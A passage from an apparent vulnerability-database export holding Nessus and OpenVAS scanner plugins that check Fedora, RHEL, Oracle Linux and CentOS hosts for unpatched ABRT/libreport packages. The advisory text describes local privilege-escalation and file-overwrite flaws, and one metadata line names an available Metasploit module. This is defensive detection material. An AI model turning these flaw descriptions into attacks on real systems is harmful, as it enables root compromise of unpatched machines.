script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'ABRT raceabrt Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:abrt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:gnome-abrt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:libreport\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:21\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^21([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 21.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC21\", reference:\"abrt-2.3.0-7.fc21\")) flag++;\nif (rpm_check(release:\"FC21\", reference:\"gnome-abrt-1.0.0-3.fc21\")) flag++;\nif (rpm_check(release:\"FC21\", reference:\"libreport-2.3.0-8.fc21\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"abrt / gnome-abrt / libreport\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2020-01-24T18:28:40", "description": "Oracle Linux Local Security Checks ELSA-2015-1210", "cvss3": {}, "published": "2015-10-06T00:00:00", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2015-1210", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-3142", "CVE-2015-1870", "CVE-2015-3147", "CVE-2015-1869", "CVE-2015-3315", "CVE-2015-3159"], "modified": "2020-01-24T00:00:00", "id": "OPENVAS:1361412562310123084", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123084", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123084\");\n script_version(\"2020-01-24T07:57:30+0000\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 13:59:10 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"2020-01-24 07:57:30 +0000 (Fri, 24 Jan 2020)\");\n script_name(\"Oracle Linux Local Check: ELSA-2015-1210\");\n script_tag(name:\"insight\", value:\"ELSA-2015-1210 - abrt security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2015-1210\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2015-1210.html\");\n script_cve_id(\"CVE-2015-1869\", \"CVE-2015-1870\", \"CVE-2015-3142\", \"CVE-2015-3147\", \"CVE-2015-3159\", \"CVE-2015-3315\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux6\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"abrt\", rpm:\"abrt~2.0.8~26.0.1.el6_6.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"abrt-addon-ccpp\", rpm:\"abrt-addon-ccpp~2.0.8~26.0.1.el6_6.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"abrt-addon-kerneloops\", rpm:\"abrt-addon-kerneloops~2.0.8~26.0.1.el6_6.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"abrt-addon-python\", rpm:\"abrt-addon-python~2.0.8~26.0.1.el6_6.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"abrt-addon-vmcore\", rpm:\"abrt-addon-vmcore~2.0.8~26.0.1.el6_6.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"abrt-cli\", rpm:\"abrt-cli~2.0.8~26.0.1.el6_6.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"abrt-console-notification\", rpm:\"abrt-console-notification~2.0.8~26.0.1.el6_6.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"abrt-desktop\", rpm:\"abrt-desktop~2.0.8~26.0.1.el6_6.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"abrt-devel\", rpm:\"abrt-devel~2.0.8~26.0.1.el6_6.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"abrt-gui\", rpm:\"abrt-gui~2.0.8~26.0.1.el6_6.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"abrt-libs\", rpm:\"abrt-libs~2.0.8~26.0.1.el6_6.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"abrt-python\", rpm:\"abrt-python~2.0.8~26.0.1.el6_6.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"abrt-tui\", rpm:\"abrt-tui~2.0.8~26.0.1.el6_6.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"libreport\", rpm:\"libreport~2.0.9~21.0.1.el6_6.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"libreport-cli\", rpm:\"libreport-cli~2.0.9~21.0.1.el6_6.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"libreport-compat\", rpm:\"libreport-compat~2.0.9~21.0.1.el6_6.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"libreport-devel\", rpm:\"libreport-devel~2.0.9~21.0.1.el6_6.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"libreport-filesystem\", rpm:\"libreport-filesystem~2.0.9~21.0.1.el6_6.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"libreport-gtk\", rpm:\"libreport-gtk~2.0.9~21.0.1.el6_6.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"libreport-gtk-devel\", rpm:\"libreport-gtk-devel~2.0.9~21.0.1.el6_6.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"libreport-newt\", rpm:\"libreport-newt~2.0.9~21.0.1.el6_6.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"libreport-plugin-bugzilla\", rpm:\"libreport-plugin-bugzilla~2.0.9~21.0.1.el6_6.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"libreport-plugin-kerneloops\", rpm:\"libreport-plugin-kerneloops~2.0.9~21.0.1.el6_6.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"libreport-plugin-logger\", rpm:\"libreport-plugin-logger~2.0.9~21.0.1.el6_6.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"libreport-plugin-mailx\", rpm:\"libreport-plugin-mailx~2.0.9~21.0.1.el6_6.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"libreport-plugin-reportuploader\", rpm:\"libreport-plugin-reportuploader~2.0.9~21.0.1.el6_6.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"libreport-python\", rpm:\"libreport-python~2.0.9~21.0.1.el6_6.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-24T18:27:54", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-07-08T00:00:00", "type": "openvas", "title": "RedHat Update for abrt RHSA-2015:1210-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-3142", "CVE-2015-1870", "CVE-2015-3147", "CVE-2015-1869", "CVE-2015-3315", "CVE-2015-3159"], "modified": "2020-01-24T00:00:00", "id": "OPENVAS:1361412562310871387", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871387", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for abrt RHSA-2015:1210-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871387\");\n script_version(\"2020-01-24T07:57:30+0000\");\n script_cve_id(\"CVE-2015-1869\", \"CVE-2015-1870\", \"CVE-2015-3142\",\n \"CVE-2015-3147\", \"CVE-2015-3159\", \"CVE-2015-3315\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-24 07:57:30 +0000 (Fri, 24 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-07-08 06:31:19 +0200 (Wed, 08 Jul 2015)\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for abrt RHSA-2015:1210-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'abrt'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"ABRT (Automatic Bug Reporting Tool) is a\n tool to help users to detect defects in applications and to create a bug\n report with all the information needed by a maintainer to fix it. It uses\n a plug-in system to extend its\nfunctionality.\n\nIt was found that ABRT was vulnerable to multiple race condition and\nsymbolic link flaws. A local attacker could use these flaws to potentially\nescalate their privileges on the system. (CVE-2015-3315)\n\nIt was discovered that the kernel-invoked coredump processor provided by\nABRT wrote core dumps to files owned by other system users. This could\nresult in information disclosure if an application crashed while its\ncurrent directory was a directory writable to by other users (such as\n/tmp). (CVE-2015-3142)\n\nIt was discovered that the default event handling scripts installed by ABRT\ndid not handle symbolic links correctly. A local attacker with write access\nto an ABRT problem directory could use this flaw to escalate their\nprivileges. (CVE-2015-1869)\n\nIt was found that the ABRT event scripts created a user-readable copy of an\nsosreport file in ABRT problem directories, and included excerpts of\n/var/log/messages selected by the user-controlled process name, leading to\nan information disclosure. (CVE-2015-1870)\n\nIt was discovered that, when moving problem reports between certain\ndirectories, abrt-handle-upload did not verify that the new problem\ndirectory had appropriate permissions and did not contain symbolic links.\nAn attacker able to create a crafted problem report could use this flaw to\nexpose other parts of ABRT, or to overwrite arbitrary files on the system.\n(CVE-2015-3147)\n\nIt was discovered that the abrt-action-install-debuginfo-to-abrt-cache\nhelper program did not properly filter the process environment before\ninvoking abrt-action-install-debuginfo. A local attacker could use this\nflaw to escalate their privileges on the system. (CVE-2015-3159)\n\nThe CVE-2015-1869, CVE-2015-1870, CVE-2015-3142, CVE-2015-3147, and\nCVE-2015-3159 issues were discovered by Florian Weimer of Red Hat\nProduct Security.\n\nAll users of abrt are advised to upgrade to these updated packages, which\ncorrect these issues.\");\n script_tag(name:\"affected\", value:\"abrt on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_xref(name:\"RHSA\", value:\"2015:1210-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2015-July/msg00002.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_6\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"abrt\", rpm:\"abrt~2.0.8~26.el6_6.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"abrt-addon-ccpp\", rpm:\"abrt-addon-ccpp~2.0.8~26.el6_6.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"abrt-addon-kerneloops\", rpm:\"abrt-addon-kerneloops~2.0.8~26.el6_6.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"abrt-addon-python\", rpm:\"abrt-addon-python~2.0.8~26.el6_6.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"abrt-cli\", rpm:\"abrt-cli~2.0.8~26.el6_6.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"abrt-debuginfo\", rpm:\"abrt-debuginfo~2.0.8~26.el6_6.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"abrt-desktop\", rpm:\"abrt-desktop~2.0.8~26.el6_6.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"abrt-gui\", rpm:\"abrt-gui~2.0.8~26.el6_6.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"abrt-libs\", rpm:\"abrt-libs~2.0.8~26.el6_6.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"abrt-tui\", rpm:\"abrt-tui~2.0.8~26.el6_6.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreport\", rpm:\"libreport~2.0.9~21.el6_6.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreport-cli\", rpm:\"libreport-cli~2.0.9~21.el6_6.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreport-compat\", rpm:\"libreport-compat~2.0.9~21.el6_6.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreport-debuginfo\", rpm:\"libreport-debuginfo~2.0.9~21.el6_6.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreport-gtk\", rpm:\"libreport-gtk~2.0.9~21.el6_6.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreport-newt\", rpm:\"libreport-newt~2.0.9~21.el6_6.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreport-plugin-kerneloops\", rpm:\"libreport-plugin-kerneloops~2.0.9~21.el6_6.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreport-plugin-logger\", rpm:\"libreport-plugin-logger~2.0.9~21.el6_6.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreport-plugin-mailx\", rpm:\"libreport-plugin-mailx~2.0.9~21.el6_6.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreport-plugin-reportuploader\", rpm:\"libreport-plugin-reportuploader~2.0.9~21.el6_6.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreport-plugin-rhtsupport\", rpm:\"libreport-plugin-rhtsupport~2.0.9~21.el6_6.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreport-python\", rpm:\"libreport-python~2.0.9~21.el6_6.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-24T18:27:59", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-07-01T00:00:00", "type": "openvas", "title": "Fedora Update for abrt FEDORA-2015-10193", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-3151", "CVE-2015-3142", "CVE-2015-1870", "CVE-2015-3150", "CVE-2015-3147", "CVE-2015-1869", "CVE-2015-3315", "CVE-2015-3159"], "modified": "2020-01-24T00:00:00", "id": "OPENVAS:1361412562310869478", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310869478", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for abrt FEDORA-2015-10193\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.869478\");\n script_version(\"2020-01-24T07:57:30+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-24 07:57:30 +0000 (Fri, 24 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-07-01 06:27:48 +0200 (Wed, 01 Jul 2015)\");\n script_cve_id(\"CVE-2015-3315\", \"CVE-2015-3142\", \"CVE-2015-1869\", \"CVE-2015-1870\",\n \"CVE-2015-3151\", \"CVE-2015-3150\", \"CVE-2015-3159\", \"CVE-2015-3147\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for abrt FEDORA-2015-10193\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'abrt'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"abrt on Fedora 21\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2015-10193\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2015-June/161247.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC21\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC21\")\n{\n\n if ((res = isrpmvuln(pkg:\"abrt\", rpm:\"abrt~2.3.0~7.fc21\", rls:\"FC21\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-24T18:27:40", "description": "Check the version of abrt", "cvss3": {}, "published": "2015-06-16T00:00:00", "type": "openvas", "title": "CentOS Update for abrt CESA-2015:1083 centos7", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-3151", "CVE-2015-3142", "CVE-2015-1870", "CVE-2015-3150", "CVE-2015-3147", "CVE-2015-1869", "CVE-2015-3315", "CVE-2015-3159"], "modified": "2020-01-24T00:00:00", "id": "OPENVAS:1361412562310882200", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882200", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for abrt CESA-2015:1083 centos7\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882200\");\n script_version(\"2020-01-24T07:57:30+0000\");\n script_cve_id(\"CVE-2015-1869\", \"CVE-2015-1870\", \"CVE-2015-3142\", \"CVE-2015-3147\",\n \"CVE-2015-3150\", \"CVE-2015-3151\", \"CVE-2015-3159\", \"CVE-2015-3315\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-24 07:57:30 +0000 (Fri, 24 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-06-16 06:14:05 +0200 (Tue, 16 Jun 2015)\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for abrt CESA-2015:1083 centos7\");\n script_tag(name:\"summary\", value:\"Check the version of abrt\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"ABRT (Automatic Bug Reporting Tool) is a tool\n to help users to detect\ndefects in applications and to create a bug report with all the information\nneeded by a maintainer to fix it. It uses a plug-in system to extend its\nfunctionality.\n\nIt was found that ABRT was vulnerable to multiple race condition and\nsymbolic link flaws. A local attacker could use these flaws to potentially\nescalate their privileges on the system. (CVE-2015-3315)\n\nIt was discovered that the kernel-invoked coredump processor provided by\nABRT wrote core dumps to files owned by other system users. This could\nresult in information disclosure if an application crashed while its\ncurrent directory was a directory writable to by other users (such as\n/tmp). (CVE-2015-3142)\n\nIt was discovered that the default event handling scripts installed by ABRT\ndid not handle symbolic links correctly. A local attacker with write access\nto an ABRT problem directory could use this flaw to escalate their\nprivileges. (CVE-2015-1869)\n\nIt was found that the ABRT event scripts created a user-readable copy of an\nsosreport file in ABRT problem directories, and included excerpts of\n/var/log/messages selected by the user-controlled process name, leading to\nan information disclosure. (CVE-2015-1870)\n\nIt was discovered that, when moving problem reports between certain\ndirectories, abrt-handle-upload did not verify that the new problem\ndirectory had appropriate permissions and did not contain symbolic links.\nAn attacker able to create a crafted problem report could use this flaw to\nexpose other parts of ABRT to attack, or to overwrite arbitrary files on\nthe system. (CVE-2015-3147)\n\nMultiple directory traversal flaws were found in the abrt-dbus D-Bus\nservice. A local attacker could use these flaws to read and write arbitrary\nfiles as the root user. (CVE-2015-3151)\n\nIt was discovered that the abrt-dbus D-Bus service did not properly check\nthe validity of the problem directory argument in the ChownProblemDir,\nDeleteElement, and DeleteProblem methods. A local attacker could use this\nflaw to take ownership of arbitrary files and directories, or to delete\nfiles and directories as the root user. 